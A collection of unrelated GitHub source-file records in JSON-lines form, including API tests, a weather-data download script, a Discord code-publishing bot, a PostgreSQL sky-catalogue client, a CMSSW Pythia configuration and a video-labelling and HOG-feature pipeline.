requests.post(ins, data=json.dumps(payload), headers=headers, verify=False)\n\n\n def test_authenticate(self):\n ins = parse.urljoin(self.url, 'sec')\n r = requests.get(ins, auth=('admin', 'admin'))\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n\n\n\nif __name__ == '__main__':\n # unittest.main()\n suite = unittest.TestSuite()\n suite.addTest(GetEventListTest(\"test_authenticate\"))\n runner = unittest.TextTestRunner()\n runner.run(suite)\n","repo_name":"huifer/Automated_Framework","sub_path":"src/接口自动化测试.py","file_name":"接口自动化测试.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8496321083","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 22 14:33:38 2017\n\n@author: paul\n\"\"\"\n\nfrom weatherTLKT import Weather\n\ntyp='ens'\n\nfor ss in range(1,9):\n if typ=='solo':\n mydate='20171127'\n website='http://nomads.ncep.noaa.gov:9090/dods'\n model='gfs'\n resolution='0p25'\n url=website+'/'+model+'_'+resolution+'/'+model+mydate+'/'+model+'_'+resolution+'_00z'\n pathToSaveObj='../data/'+ model+mydate+'_'+resolution\n \n else : \n mydate='20171127'\n website='http://nomads.ncep.noaa.gov:9090/dods'\n model='gens'\n resolution='0p25'\n num_scenario='0'+str(ss)\n url=website+'/'+model+'/'+model+mydate+'/'+'gep'+num_scenario+'_00z'\n pathToSaveObj='../data/'+ model+mydate+'_'+num_scenario\n \n latBound=[43,50]\n lonBound=[-10+360, 360]\n \n \n Weather.download(url,pathToSaveObj,latBound=latBound,lonBound=lonBound,timeSteps=[0,85],ens=True)\n\n","repo_name":"PBarde/IBoat-PMCTS","sub_path":"code/model/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"12024635472","text":"import sys\nfrom time import time\n\nfrom ._core import blue, bold, pprint, red, width, wrap_text\n\n\nclass session_line:\n \"\"\"\n Print the elapsed time after the execution of a block of code.\n \"\"\"\n\n def __init__(self, desc=\"Running... \", disable=False):\n self._disable = disable\n self._tstart = None\n self._desc = desc\n self.elapsed = None\n\n def __enter__(self):\n self._tstart = time()\n if not self._disable:\n sys.stdout.write(self._desc)\n sys.stdout.flush()\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n from humanfriendly import format_timespan\n from limix.__config__ import get_info\n\n self.elapsed = time() - self._tstart\n fail = exception_type is not None\n\n if not self._disable:\n if get_info(\"rich_text\") and not get_info(\"building_doc\"):\n # New line, get back to previous line, and advance cursor to the end\n # of the line. 
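The `test_create_one` case in the API test sample above sends its POST but asserts nothing about the response, so it can never fail. A completed version is sketched below; the expected status code is an assumption about the service, not something the source states:

def test_create_one(self):
    ins = parse.urljoin(self.url, 'create')
    payload = {"title": 123}
    headers = {'Content-Type': 'application/json', 'accept': 'application/json'}
    r = requests.post(ins, data=json.dumps(payload), headers=headers, verify=False)
    self.assertEqual(r.status_code, 201)  # hypothetical: adjust to the API's contract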
This allows us to always get back to the right cursor\n # position, as long as the cursor is still in the correct line.\n print(\"\\n\\033[1A\\033[{}C\".format(len(self._desc)), end=\"\")\n if fail:\n msg = bold(red(\"failed\"))\n msg += \" ({}).\".format(format_timespan(self.elapsed))\n pprint(msg)\n else:\n print(\"done (%s).\" % format_timespan(self.elapsed))\n sys.stdout.flush()\n\n\nclass session_block:\n \"\"\"\n Print session block: session start and session end.\n \"\"\"\n\n def __init__(self, session_name, disable=False):\n self._session_name = session_name\n self._start = None\n self._disable = disable\n\n def __enter__(self):\n self._start = time()\n msg = \" {} starts \".format(self._session_name)\n if not self._disable:\n msg = wrap_text(msg, width())\n pprint(bold(blue(msg)))\n\n def __exit__(self, exception_type, *_):\n elapsed = time() - self._start\n fail = exception_type is not None\n\n if fail:\n msg = \" {} fails in {:.2f} seconds \"\n color = red\n else:\n msg = \" {} ends in {:.2f} seconds \"\n color = blue\n\n msg = msg.format(self._session_name, elapsed)\n if not self._disable:\n msg = wrap_text(msg, width())\n pprint(bold(color(msg)))\n","repo_name":"andrewkern/limix","sub_path":"limix/_display/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17872464035","text":"import tkinter as tk\nfrom PIL import Image, ImageTk\n\n# Definindo conteúdo interno da janela do programa\nroot = tk.Tk()\n\ncanvas = tk.Canvas(root, width=1280, height=720)\n# Para um design em um grid em 3 colunas\ncanvas.grid(columnspan=3)\n\n#logo\nlogo = Image.open('assets/logo.png')\nlogo = ImageTk.PhotoImage(logo)\nlogo_label = tk.Label(image=logo)\nlogo_label.image = logo_label\nlogo_label.grid(column=0, row=0)\n\n\n\n# Definindo limite do conteúdo interno do programa\nroot.mainloop()","repo_name":"danfigueroa/ac","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14820898629","text":"# Owner(s): [\"oncall: distributed\"]\nimport os\n\nfrom torch.distributed._spmd.graph_utils import dump_graphs_to_files\nfrom torch.testing._internal.common_utils import run_tests\nfrom torch.testing._internal.distributed._tensor.common_dtensor import DTensorTestBase\n\n\nclass GraphUtilsTest(DTensorTestBase):\n @property\n def world_size(self):\n return 1\n\n def test_dump_graphs(self):\n class FakeGraph:\n def __init__(self, postfix):\n self.graph = f\"fake graph str {postfix}\"\n\n def __str__(self) -> str:\n return self.graph\n\n fake_graph1 = {\"fake_graph1\": FakeGraph(1)}\n folder = dump_graphs_to_files(fake_graph1)\n fake_graph2 = {\"fake_graph2\": FakeGraph(1)}\n new_folder = dump_graphs_to_files(fake_graph2, folder)\n self.assertEqual(folder, new_folder)\n\n for i in (1, 2):\n path = os.path.join(folder, f\"fake_graph{i}.graph\")\n self.assertTrue(os.path.exists(path))\n with open(path) as fp:\n fake_graph = fake_graph1 if i == 1 else fake_graph2\n self.assertEqual(fp.readline(), fake_graph[f\"fake_graph{i}\"].graph)\n os.remove(path)\n\n os.rmdir(folder)\n\n\nif __name__ == \"__main__\":\n if False:\n 
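The limix session helpers above wrap a block of work in start/elapsed-time reporting. A minimal self-contained analogue using only the standard library:

import time
from contextlib import contextmanager

@contextmanager
def timed(desc="Running... "):
    print(desc, end="", flush=True)
    start = time.time()
    try:
        yield
    finally:
        print(f"done ({time.time() - start:.2f} seconds).")

with timed("Sleeping... "):
    time.sleep(0.1)   # prints: Sleeping... done (0.10 seconds).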
run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/_spmd/test_graph_utils.py","file_name":"test_graph_utils.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"9709871638","text":"import aiohttp\nimport disnake\nfrom disnake.ext import commands\nfrom disnake import ApplicationCommandInteraction as ACI\nimport os\n\nclass PublishCodeModal(disnake.ui.Modal):\n def __init__(self, *args, **kwargs) -> None:\n components = [\n disnake.ui.TextInput(\n label=\"Введіть колір ембеду у форматі HEX (RRGGBB)\",\n placeholder=\"ffffff\",\n custom_id=\"color\",\n required=True,\n style=disnake.TextInputStyle.short,\n min_length=6,\n max_length=6,\n ),\n disnake.ui.TextInput(\n label=\"Введіть мову програмувания\",\n placeholder=\"c\",\n custom_id=\"language\",\n required=True,\n style=disnake.TextInputStyle.short,\n max_length=32,\n ),\n disnake.ui.TextInput(\n label=\"Введіть заголовок\",\n placeholder=\"Hello, world!\",\n custom_id=\"title\",\n required=True,\n style=disnake.TextInputStyle.short,\n max_length=100,\n ),\n disnake.ui.TextInput(\n label=\"Введіть код\",\n placeholder=\"#include <stdio.h>\\n\"\n \"int main(void)\\n\"\n \"{\\n\"\n \" puts(\\\"Hello, world!\\\");\\n\"\n \"}\\n\",\n custom_id=\"code\",\n required=True,\n style=disnake.TextInputStyle.paragraph,\n ),\n disnake.ui.TextInput(\n label=\"Введіть теги\",\n placeholder=\"#javascript #python\",\n custom_id=\"tags\",\n required=True,\n style=disnake.TextInputStyle.short,\n ),\n ]\n super().__init__(\n title=\"Публікація коду до #useful-codes\",\n custom_id=\"publishcode\",\n components=components,\n )\n async def callback(self, interaction: disnake.ModalInteraction):\n color = 0xFFFFFF\n try:\n color = int(interaction.text_values['color'], base=16)\n except:\n pass\n embed = disnake.Embed(\n color=color,\n title=interaction.text_values['title'],\n description=f\"```{interaction.text_values['language']}\\n\"\n f\"{interaction.text_values['code']}\\n\"\n \"```\",\n ).set_footer(\n text=interaction.text_values['tags'],\n ).set_author(\n name=interaction.user.name,\n icon_url=interaction.user.display_avatar,\n )\n async with aiohttp.ClientSession() as session:\n webhook = disnake.Webhook.from_url(\n url=(\"https://discord.com/api/webhooks\"\n f\"/{os.getenv('PUBLISHCODE_WEBHOOK_ID')}\"\n f\"/{os.getenv('PUBLISHCODE_WEBHOOK_TOKEN')}\"),\n session=session,\n )\n await interaction.response.defer()\n message = interaction.client.get_message(\n (await webhook.send(\n embeds=[\n embed,\n ],\n wait=True,\n )).id\n )\n await message.add_reaction('👍')\n await message.add_reaction('👎')\n await interaction.followup.send(\n content=\"✅ Успішно надіслано код!\",\n ephemeral=True,\n )\n\nclass PublishingUsefulCodes(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @staticmethod\n def can_publish(member: disnake.Member) -> bool:\n publish_roles = list(\n map(\n int,\n os.getenv('PUBLISHCODE_ROLES').split(',')\n )\n )\n return any(\n role.id in publish_roles\n for role in member.roles\n )\n \n @commands.slash_command(description=\"Надсилає ваш корисний або цікавий код до #useful-codes!\")\n async def publishcode(self, inner: ACI):\n if not self.can_publish(inner.author):\n await inner.response.send_message(\n content=\"❌ Відмовлено у доступі!\",\n ephemeral=True,\n )\n return\n await inner.response.send_modal(\n PublishCodeModal(\n title=\"Публікація коду до #useful-codes\"\n )\n ) \n\ndef setup(bot):\n 
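Note that the `if False:` guard in the PyTorch test sample above makes the file a no-op when executed directly, possibly a deliberately disabled suite, but worth flagging. The conventional entry point would be:

if __name__ == "__main__":
    run_tests()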
bot.add_cog(PublishingUsefulCodes(bot))\n","repo_name":"razenxc/CharmCodex-bot","sub_path":"bot/commands/publishcode.py","file_name":"publishcode.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2282800464","text":"\nimport logging\nimport numpy as np\nimport os\nimport psycopg2 as pg\nimport yaml\nfrom astropy.table import Table\nfrom time import time\nfrom collections import Counter\nfrom tempfile import mkstemp\n\nlogger = logging.getLogger(__name__)\n\"\"\"\nlogger.setLevel(logging.DEBUG)\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nch.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"))\n\nlogger.addHandler(ch)\n\"\"\"\n\n__all__ = [\"BaseWSDB\"]\n\nclass BaseWSDB(object):\n\n \"\"\" A base client to access the World Sky Database. \"\"\"\n\n def __init__(self, **kwargs):\n r\"\"\"\n Create a new database connection to the World Sky database.\n\n The connection parameters can be specified as a string:\n\n wsdb = WSDB(\"user=goto password=secret\")\n\n or using a set of keyword arguments:\n\n wsdb = WSDB(user=\"goto\", password=\"secret\")\n\n Or as a mix of both. The basic connection parameters are:\n\n - *dbname*: the database name\n - *database*: the database name (only as keyword argument)\n - *user*: the user name used to authenticate\n - *password*: password used to authenticate\n - *host*: database host address (defaults to UNIX socket if not given)\n - *port*: connection port number (defaults to 5432 if not given)\n \"\"\"\n\n default_configuration_filename = os.path.expanduser(\"~/.goto-wsdb.yaml\")\n if os.path.exists(default_configuration_filename):\n with open(default_configuration_filename, \"r\") as fp:\n default_configuration = yaml.load(fp)\n\n for k, v in default_configuration.items():\n kwargs.setdefault(k, v)\n\n self._default_return_as_table = True\n self._connection = pg.connect(**kwargs)\n return None\n\n\n def close(self):\n r\"\"\"\n Close the connection to the WSDB.\n \"\"\"\n return self._connection.close()\n\n\n @property\n def catalogues(self):\n r\"\"\"\n Return a cached tuple of the astronomical catalogues available.\n \"\"\"\n\n if not hasattr(self, \"_catalogues\"):\n _, results, __ = self.execute(\"\"\"\n SELECT table_name\n FROM information_schema.tables\n WHERE table_schema = 'public'\"\"\", fetch=True)\n self._catalogues = tuple([i for sl in results for i in sl])\n return self._catalogues\n\n\n def _check_catalogue(self, catalogue):\n r\"\"\"\n Check whether a catalogue is available in the WSDB.\n\n :param catalogue_name:\n The source catalogue to query. 
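The Discord cog above reads its webhook and role configuration from environment variables at call time, so a missing variable only surfaces when a user runs the command. A small startup check (variable names taken verbatim from the cog) fails fast instead:

import os

REQUIRED = ("PUBLISHCODE_WEBHOOK_ID", "PUBLISHCODE_WEBHOOK_TOKEN", "PUBLISHCODE_ROLES")
missing = [name for name in REQUIRED if not os.getenv(name)]
if missing:
    raise RuntimeError(f"missing environment variables: {', '.join(missing)}")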
Available catalogues are accessible\n through the ``WSDB.catalogues`` attribute.\n\n :returns:\n ``True`` if the catalogue is available.\n\n :raises ValueError:\n If the catalogue is not available.\n \"\"\"\n return True\n \n if catalogue not in self.catalogues:\n raise ValueError(\"catalogue '{}' unavailable (available: {})\".format(\n catalogue, \", \".join(self.catalogues)))\n return True\n\n\n def select(self, query, values=None, **kwargs):\n r\"\"\"\n A convenience function to perform SQL select queries on the WSDB.\n\n Perform a SQL select query\n select some results.\n \"\"\"\n\n names, rows, cursor = self.execute(query, values, fetch=True, **kwargs)\n if len(rows) == 0:\n return None\n\n if kwargs.get(\"as_table\", self._default_return_as_table):\n counted_names = Counter(names)\n duplicates = [k for k, v in counted_names.items() if v > 1]\n\n prefixes = kwargs.get(\"prefixes\", True)\n use_prefixes = list(map(str, range(max(counted_names.values())))) \\\n if isinstance(prefixes, bool) else prefixes\n\n # Put the prefixes and names in the right order & format\n prefixes = [\n ([], [use_prefixes[names[:i].count(n)]])[n in duplicates] \\\n for i, n in enumerate(names)]\n names = [[n] for n in names]\n names = [\".\".join(p + n) for p, n in zip(prefixes, names)]\n return Table(rows=rows, names=names)\n\n else:\n return rows\n\n\n def execute(self, query, values=None, fetch=False, cursor=None, **kwargs):\n r\"\"\"\n Execute a SQL query on the WSDB.\n\n :param query:\n The SQL query to execute.\n\n :param values: [optional]\n Values to use when formatting the SQL string.\n\n :param fetch: [optional]\n Fetch all row results for this query (default: `False`).\n\n :returns:\n A three-length tuple containing the column names (where applicable),\n the results (if `fetch` is `True`, otherwise `None`), and the\n cursor.\n\n \"\"\"\n\n cursor_supplied = cursor is not None\n\n if not cursor_supplied:\n logger.debug(\"Creating cursor\")\n cursor = self._connection.cursor()\n\n t_init = time()\n try:\n logger.debug(\"Executing query: {} with values: {}\".format(\n query, values))\n cursor.execute(query, values)\n results = cursor.fetchall() if fetch else None\n\n except pg.ProgrammingError:\n logger.exception(\"SQL query failed: {} {}\".format(query, values))\n if not cursor_supplied:\n cursor.close()\n raise\n\n else:\n t_taken = 1e3 * (time() - t_init)\n logger.debug(\"SQL query took {0:.0f} ms: {1} (values: {2})\".format(\n t_taken, query, values))\n\n names = None if cursor.description is None \\\n else tuple([col[0] for col in cursor.description])\n\n if not cursor_supplied:\n cursor.close()\n\n return (names, results, cursor)\n\n\n\n\n\n def _local_join(self, query, table_name, table, values=None, analyze=True,\n **kwargs):\n r\"\"\"\n Perform a join between a local table and a remote catalogue on the\n World Sky Database.\n\n \"\"\"\n\n delimiter = kwargs.get(\"delimiter\", \",\")\n conversions = {\n np.int32: \"integer\",\n np.int64: \"bigint\",\n np.float32: \"real\",\n np.float64: \"double precision\",\n np.string_: \"varchar\"\n }\n\n schema = []\n for column, (dtype, _) in table.dtype.fields.items():\n if \" \" in column:\n raise ValueError(\"invalid column name: cannot contain spaces\")\n schema.append(\"{0} {1}\".format(column, conversions[dtype.type]))\n\n _, local_path = mkstemp()\n\n table.write(local_path, format=\"ascii.no_header\", delimiter=delimiter,\n overwrite=True)\n\n with self._connection.cursor() as cursor:\n\n self.execute(\"\"\"\n SET cursor_tuple_fraction TO 1;\n SET 
enable_seqscan TO off;\n SET enable_mergejoin to off;\n set enable_hashjoin to off;\n \"\"\")\n\n self.execute(\"CREATE TEMPORARY TABLE {0} ({1})\".format(\n table_name, \", \".join(schema)), cursor=cursor)\n\n try:\n logger.debug(\"Copying from {}\".format(local_path))\n\n with open(local_path, \"r\") as fp:\n cursor.copy_from(fp, table_name,\n sep=delimiter, columns=table.dtype.names)\n\n if analyze:\n self.execute(\"ANALYZE {0}\".format(table_name), cursor=cursor)\n\n logger.debug(\"Ready\")\n\n except (pg.ProgrammingError, pg.DataError):\n logger.exception(\"Failed to upload table:\")\n self._connection.rollback()\n\n result = self.select(query, values, cursor=cursor)\n\n self._connection.rollback()\n #cursor.close()\n\n os.unlink(local_path)\n return result\n","repo_name":"GOTO-OBS/goto-wsdb","sub_path":"wsdb/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15168085986","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process('GEN')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('SimGeneral.MixingModule.mixNoPU_cfi')\nprocess.load('Configuration.Geometry.GeometryExtended2015Reco_cff')\nprocess.load('Configuration.Geometry.GeometryExtended2015_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff')\nprocess.load('Configuration.StandardSequences.Generator_cff')\nprocess.load('IOMC.EventVertexGenerators.VtxSmearedRealistic8TeVCollision_cfi')\nprocess.load('GeneratorInterface.Core.genFilterSummary_cff')\nprocess.load('Configuration.StandardSequences.SimIdeal_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1000)\n)\n\n# Input source\nprocess.source = cms.Source(\"EmptySource\")\n\nprocess.options = cms.untracked.PSet()\n\n# Output definition\n\nprocess.RAWSIMoutput = cms.OutputModule(\"PoolOutputModule\",\n splitLevel = cms.untracked.int32(0),\n eventAutoFlushCompressedSize = cms.untracked.int32(5242880),\n outputCommands = process.RAWSIMEventContent.outputCommands,\n fileName = cms.untracked.string('file:MinbiasTest_GEN.root'),\n dataset = cms.untracked.PSet(\n filterName = cms.untracked.string(''),\n dataTier = cms.untracked.string('GEN-SIM')\n ),\n SelectEvents = cms.untracked.PSet(\n SelectEvents = cms.vstring('generation_step')\n )\n)\n\n# Additional output definition\n\n# Other statements\nprocess.genstepfilter.triggerConditions=cms.vstring(\"generation_step\")\n\nprocess.load(\"Configuration.TotemCommon.PythiaSD_cfi\")\nprocess.generator.Verbosity = cms.untracked.int32(0)\nprocess.generator.maxEventsToPrint = cms.untracked.int32(10)\nprocess.generator.comEnergy = cms.double(13000.0)\n\n\n# Path and EndPath definitions\nprocess.generation_step = cms.Path(process.pgen)\nprocess.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)\n\n# Schedule definition\nprocess.schedule = cms.Schedule(process.generation_step, process.RAWSIMoutput_step)\n# filter all path with the production filter sequence\nfor path in process.paths:\n\tgetattr(process,path)._seq = process.generator * getattr(process,path)._seq \n\n# customisation of the process.\n\n# Automatic addition of the 
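Illustrative use of the BaseWSDB client above; the credentials and catalogue name are placeholders, `%s` is the psycopg2 parameter style the client already uses, and `select` returns an astropy Table by default:

wsdb = BaseWSDB(user="goto", password="secret", host="localhost")
try:
    table = wsdb.select("SELECT * FROM some_catalogue LIMIT %s", (5,))
    print(table)
finally:
    wsdb.close()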
customisation function from SLHCUpgradeSimulations.Configuration.postLS1Customs\nfrom SLHCUpgradeSimulations.Configuration.postLS1Customs import customisePostLS1 \n\n#call to customisation function customisePostLS1 imported from SLHCUpgradeSimulations.Configuration.postLS1Customs\nprocess = customisePostLS1(process)\n\n# End of customisation functions\n","repo_name":"MyEtesami/src","sub_path":"Configuration/TotemStandardSequences/test/RPT1T2CMS/step0_Pythia.py","file_name":"step0_Pythia.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12403572983","text":"# 视频帧率25fps\nimport argparse\nimport cv2\nimport h5py\nimport numpy as np\nfrom hog_feature import HogDescriptor\nimport os\na = []\nb = []\n\n# 提取视频帧,并全部标注为0\ndef label_data(args):\n dataroot = args.video_path\n datafile = h5py.File(args.data_store_path, 'w')\n crop_size = int(args.crop_size/2)\n sample = []\n label = []\n cap = cv2.VideoCapture(dataroot)\n k = 0\n i = 1\n while True:\n k = k + 1\n print(k)\n ret, frame = cap.read()\n if ret: # 视频未读取完,有帧存在\n temp = frame[b[-1] - crop_size:b[-1] + crop_size, a[-1] - crop_size:a[-1] + crop_size, :]\n temp = cv2.cvtColor(temp, cv2.COLOR_RGB2GRAY)\n temp = np.array(temp)\n # cv2.imshow('label',temp)\n frame = cv2.rectangle(frame, (a[-1] - crop_size, b[-1] - crop_size), (a[-1] + crop_size, b[-1] + crop_size), (0, 0, 255), 2)\n cv2.imshow('img', frame)\n cv2.waitKey(10)\n label_class = 0 # 先全部标注为0,然后再修改其中部分为进球帧\n print(\"No.{} frame, Label = {}\".format(k, label_class))\n label.append(label_class)\n sample.append(temp)\n else:\n break\n cap.release()\n cv2.destroyAllWindows()\n datafile.create_dataset('data', data=sample)\n datafile.create_dataset('label', data=label)\n datafile.close()\n\ndef on_Mouse(event, x, y, flag, param):\n if event == cv2.EVENT_LBUTTONDOWN:\n xy = \"%d,%d\" % (x, y)\n a.append(x)\n b.append(y)\n print(a[-1], b[-1])\n\n# 将标注的txt文件写入data.h5\ndef annotation2dataset(args):\n annotation_path = args.annotation_path\n root_path = args.data_store_path\n store_path = args.anno_data_store_path\n file = open(annotation_path, 'r', encoding='utf-8')\n old_dataset = h5py.File(root_path, 'r')\n print([key for key in old_dataset.keys()])\n origin_data = old_dataset[\"data\"][:]\n origin_label = old_dataset[\"label\"][:]\n old_dataset.close()\n new_dataset = h5py.File(store_path, 'w')\n for line in file.readlines(): # 读取标注信息\n line = line.split()\n start_frame = line[0]\n end_frame = line[1]\n if start_frame == end_frame: # 仅有一帧\n origin_label[int(start_frame)] = 1\n else: # 有球帧标注为1\n for i in range(int(start_frame), int(end_frame) + 1):\n origin_label[i] = 1\n print(origin_label[:])\n new_dataset.create_dataset('data', data=origin_data)\n new_dataset.create_dataset('label', data=origin_label)\n new_dataset.close()\n file.close()\n\n# 提取hog特征\ndef hog_extract(args):\n dataroot = args.anno_data_store_path\n storeroot = args.hog_feature_store_path\n hog = HogDescriptor(args.hog_cell_size, args.hog_block_size, args.hog_stride, args.hog_bins)\n feature = []\n temp_label = []\n datafile = h5py.File(dataroot, 'r')\n print(len(datafile['data']), len(datafile['label']))\n data = np.array(datafile['data'][0:])\n label = np.array(datafile['label'][0:])\n print(len(data), len(label))\n\n for i in range(100):\n feature.append(hog.calculate_hog(data[i])[0])\n # print(len(hog.calculate_hog(data[i])))\n temp_label.append(label[i])\n print('the %d picture has been prepared'%(i+1))\n storefile = 
h5py.File(storeroot, 'w')\n storefile.create_dataset('data', data=feature)\n storefile.create_dataset('label', data=temp_label)\n storefile.close()\n print('%d features and %d labels have been stored'%(len(feature),len(temp_label)))\n\n# 2-frame hog\ndef make2frame(args):\n f = h5py.File(args.hog_feature_store_path, 'r')\n data = np.array(f['data'])\n label = np.array(f['label'])\n new_data = []\n new_label = []\n for i in range(len(label)-1):\n new_data.append(np.append(data[i], data[i+1]))\n new_label.append(label[i] or label[i+1])\n new_f = h5py.File(\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_hog_2frame.h5\",'w')\n new_f.create_dataset('data', data=new_data)\n new_f.create_dataset('label', data=new_label)\n new_f.close()\n print(\"successfullt generate two frame\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # 任务类型\n parser.add_argument('--task', type=str, default=\"label\")\n # 视频路径\n parser.add_argument('--video_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/video/basketball-video-03.avi\")\n # 提取视频帧存储路径(label全为0)\n parser.add_argument('--data_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3.h5\")\n # 标注文件路径(.txt)\n parser.add_argument('--annotation_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/annotation.txt\")\n # 标注后视频帧存储路径\n parser.add_argument('--anno_data_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_anno.h5\")\n # 提取hog特征后数据集存储路径\n parser.add_argument('--hog_feature_store_path', type=str, default=\"/Users/maitianshouwangzhe/Desktop/zju-2020-summer-intern/label/data/data3_hog.h5\")\n # 球框帧大小\n parser.add_argument('--crop_size', type=int, default=100)\n # 特征类别,单帧hog或双帧hog\n parser.add_argument('--feature_type', type=str, default=\"one_frame_hog\")\n # hog cell大小\n parser.add_argument('--hog_cell_size', type=int, default=8)\n # hog block大小\n parser.add_argument('--hog_block_size', type=int, default=2)\n # hog block滑动步长\n parser.add_argument('--hog_stride', type=int, default=8)\n # hog 角度数量\n parser.add_argument('--hog_bins', type=int, default=9)\n args = parser.parse_args()\n\n if args.task == \"label\":\n cap = cv2.VideoCapture(args.video_path)\n ret, frame = cap.read()\n cv2.namedWindow('frame')\n cv2.setMouseCallback('frame', on_Mouse)\n cv2.imshow('frame', frame)\n cv2.waitKey(0)\n cap.release()\n cv2.destroyAllWindows()\n print(a[-1], b[-1]) # 打印方框坐标\n label_data(args)\n elif args.task == \"annotation\":\n annotation2dataset(args)\n elif args.task == \"hog_extract\":\n hog_extract(args)\n if args.feature_type == \"two_frame_hog\":\n make2frame(args)","repo_name":"Rye-Catcher-ZCH/2020-zju-summer-intern","sub_path":"label/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31631970241","text":"print(\"redistabuting files\")\n\ndataset=\"testA\"\nimport random\n\nimport os \nimport shutil\nsplit =0.1 #size of test DO NOT SET TO ZERO\n\ncwd = os.getcwd()\n\n\nwdvalidation=os.path.join( os.path.join( cwd , dataset),\"validation\")\nwdtrain=os.path.join( os.path.join( cwd , dataset),\"train\")\n\n# print(fodervalidation)\n\ndef create_dir(dir):\n if not os.path.exists(dir):\n os.makedirs(dir)\ncreate_dir(wdvalidation)\ncreate_dir(wdtrain)\n\nfodervalidation = 
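A quick way to sanity-check the annotated .h5 produced by the labelling pipeline above, e.g. the class balance of the stored frame labels (the filename follows the sample's `--anno_data_store_path` default, with the directory prefix dropped here):

import h5py
import numpy as np

with h5py.File("data3_anno.h5", "r") as f:
    labels = np.array(f["label"])
print(f"{labels.size} frames, {int(labels.sum())} labelled positive")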
os.listdir(wdvalidation)\nfor i in fodervalidation:\n create_dir(os.path.join(wdtrain,i))\n \nfodertrain = os.listdir(wdtrain)\nfor i in fodertrain:\n create_dir(os.path.join(wdvalidation,i))\n\nfor i in fodervalidation:\n wdv = os.path.join(wdvalidation,i)\n wdt = os.path.join(wdtrain,i)\n temp = os.listdir(wdv)\n\n for j in temp:\n pfrom =os.path.join(wdv,j)\n pto=os.path.join(wdt,j)\n os.replace(pfrom,pto)\n\n# print(\"step1\\n\\n\\n\\n\")\n\n\nfodertrain = os.listdir(wdtrain)\nfor i in fodertrain:\n wdv = os.path.join(wdvalidation,i)\n wdt = os.path.join(wdtrain,i)\n temp = os.listdir(wdt)\n\n for j in temp:\n if(random.random()<split):\n pfrom =os.path.join(wdt,j)\n pto=os.path.join(wdv,j)\n os.replace(pfrom,pto)\n# print(fodertrain)\n# for i in fodervalidation:\n# wd = cwd + dataset+\"/validation/\"+i\n# temp = os.listdir(wd)\n# for j in temp:\n# if(random.random()<split):\n# os.replace(cwd + dataset+\"test/\"+i+\"/\"+j,cwd + dataset+\"validation/\"+i+\"/\"+j)\n \n\n\nprint(\"redistabuting complet\")\n\n\n\n\n\n","repo_name":"COS301-SE-2020/Team-Zenith-Animal-Track-Recognition","sub_path":"Server/backend-graphQL/301 03/fileSplit.py","file_name":"fileSplit.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"165471789","text":"# coding: utf-8\n\nimport logging\n\nfrom pytest_bdd import parsers\n\nfrom tests_common.pytest_bdd import then\nfrom .folder import parse_counter\n\nfrom hamcrest import (\n assert_that,\n has_properties,\n)\n\nlog = logging.getLogger(__name__)\n\n\nATTACH_COUNTERS_RE = r'''\nuser has\n\\s*\n(?:(?P<has_attaches_count>({0})) messages? with attaches)\n(?:\n(,| and)?\\s*\n(?:\n(?:(?P<has_attaches_unseen>({0})) unseen)|\n(?:(?P<has_attaches_seen>({0})) seen)\n)\n)*\n'''.format(r'zero|no|not|one|\"\\d+\"').strip().replace('\\n', '')\n\n\n@then(ATTACH_COUNTERS_RE, parse_builder=parsers.re)\ndef step_check_attach_counters(context):\n kwargs = context.args\n counters = {}\n for k in [\n 'has_attaches_count',\n 'has_attaches_seen',\n 'has_attaches_unseen']:\n val = parse_counter(kwargs[k])\n if 